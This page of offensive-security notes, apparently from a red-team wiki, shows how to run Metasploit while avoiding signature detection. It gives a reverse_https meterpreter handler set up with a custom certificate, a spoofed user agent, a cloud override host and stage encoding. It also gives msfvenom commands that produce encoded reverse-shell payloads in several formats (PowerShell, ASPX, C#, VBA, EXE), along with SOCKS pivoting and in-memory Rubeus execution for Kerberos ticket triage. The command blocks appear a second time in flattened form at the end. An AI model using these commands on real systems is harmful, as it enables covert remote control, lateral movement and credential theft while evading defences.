Metasploit

We cannot simply use the default setup listener in Metasploit since it will be flagged by signature base.

When using HTTPS encryption, Metasploit will use its own certificate.

Generate Certificate

└─$ openssl req -new -x509 -nodes -out cert.crt -keyout priv.key -newkey rsa:4096 -days 365

└─$ cat cert.crt priv.key > cert.pem

Listener

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 10.10.10.10
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > set exitfunc thread
msf6 exploit(multi/handler) > set HttpUserAgent Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
msf6 exploit(multi/handler) > set StagerVerifySSLCert true
msf6 exploit(multi/handler) > set HandlerSSLCert /home/kali/Payload/cert.pem
msf6 exploit(multi/handler) > set OverrideLHOST ec2-10.10.10.10.ap-southeast-1.compute.amazonaws.com
msf6 exploit(multi/handler) > set OverrideLPORT 443
msf6 exploit(multi/handler) > set OverrideRequestHost true
msf6 exploit(multi/handler) > setg ReverseAllowProxy true
msf6 exploit(multi/handler) > exploit

# Encoded in used
msf6 exploit(multi/handler) > set EnableStageEncoding true
msf6 exploit(multi/handler) > set StageEncoder x64/zutto_dekiru

Shellcode Generate

# RAW
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -f raw > shellcode.bin

# PowerShell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 EXITFUNC=thread -f ps1

# ASPX
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -f aspx > met.aspx

# CSharp
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -f csharp

# VBA
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 EXITFUNC=thread -f vbapplication

# Encoded
msfvenom -p windows/meterpreter/reverse_https LHOST=eth0 LPORT=443 -e x86/shikata_ga_nai -f exe -o file_shikata.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -e x64/zutto_dekiru -f exe -o file_zutto.exe

Proxy

meterpreter > run autoroute -s target-network/24
msf6 > background
msf6 > use auxiliary/server/socks_proxy
msf6 > set srvhost 127.0.0.1
msf6 > set srvport 9050
msf6 > set version 4a
msf6 > exploit -j

msf6 > background
msf6 > use multi/manage/autoroute
msf6 > set session 1
msf6 > exploit
msf6 > use auxiliary/server/socks_proxy
msf6 > set srvhost 127.0.0.1
msf6 > set srvport 9050
msf6 > set version 4a
msf6 > exploit -j

Execute-Assembly

msf6 > use post/windows/manage/execute_dotnet_assembly
msf6 > post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/kali/Tools/Rubues.exe
msf6 > post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS "triage"
msf6 > post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf6 > post(windows/manage/execute_dotnet_assembly) > run

PreviousC2 Infrastructure NextExecution

Last updated 1 year ago

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set lhost 10.10.10.10 msf6 exploit(multi/handler) > set lport 443 msf6 exploit(multi/handler) > set exitfunc thread msf6 exploit(multi/handler) > set HttpUserAgent Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 msf6 exploit(multi/handler) > set StagerVerifySSLCert true msf6 exploit(multi/handler) > set HandlerSSLCert /home/kali/Payload/cert.pem msf6 exploit(multi/handler) > set OverrideLHOST ec2-10.10.10.10.ap-southeast-1.compute.amazonaws.com msf6 exploit(multi/handler) > set OverrideLPORT 443 msf6 exploit(multi/handler) > set OverrideRequestHost true msf6 exploit(multi/handler) > setg ReverseAllowProxy true msf6 exploit(multi/handler) > exploit # Encoded in used msf6 exploit(multi/handler) > set EnableStageEncoding true msf6 exploit(multi/handler) > set StageEncoder x64/zutto_dekiru

# RAW msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -f raw > shellcode.bin # PowerShell msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 EXITFUNC=thread -f ps1 # ASPX msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -f aspx > met.aspx # CSharp msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -f csharp # VBA msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 EXITFUNC=thread -f vbapplication # Encoded msfvenom -p windows/meterpreter/reverse_https LHOST=eth0 LPORT=443 -e x86/shikata_ga_nai -f exe -o file_shikata.exe msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -e x64/zutto_dekiru -f exe -o file_zutto.exe

meterpreter > run autoroute -s target-network/24 msf6 > background msf6 > use auxiliary/server/socks_proxy msf6 > set srvhost 127.0.0.1 msf6 > set srvport 9050 msf6 > set version 4a msf6 > exploit -j msf6 > background msf6 > use multi/manage/autoroute msf6 > set session 1 msf6 > exploit msf6 > use auxiliary/server/socks_proxy msf6 > set srvhost 127.0.0.1 msf6 > set srvport 9050 msf6 > set version 4a msf6 > exploit -j

msf6 > use post/windows/manage/execute_dotnet_assembly msf6 > post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/kali/Tools/Rubues.exe msf6 > post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS "triage" msf6 > post(windows/manage/execute_dotnet_assembly) > set SESSION 1 msf6 > post(windows/manage/execute_dotnet_assembly) > run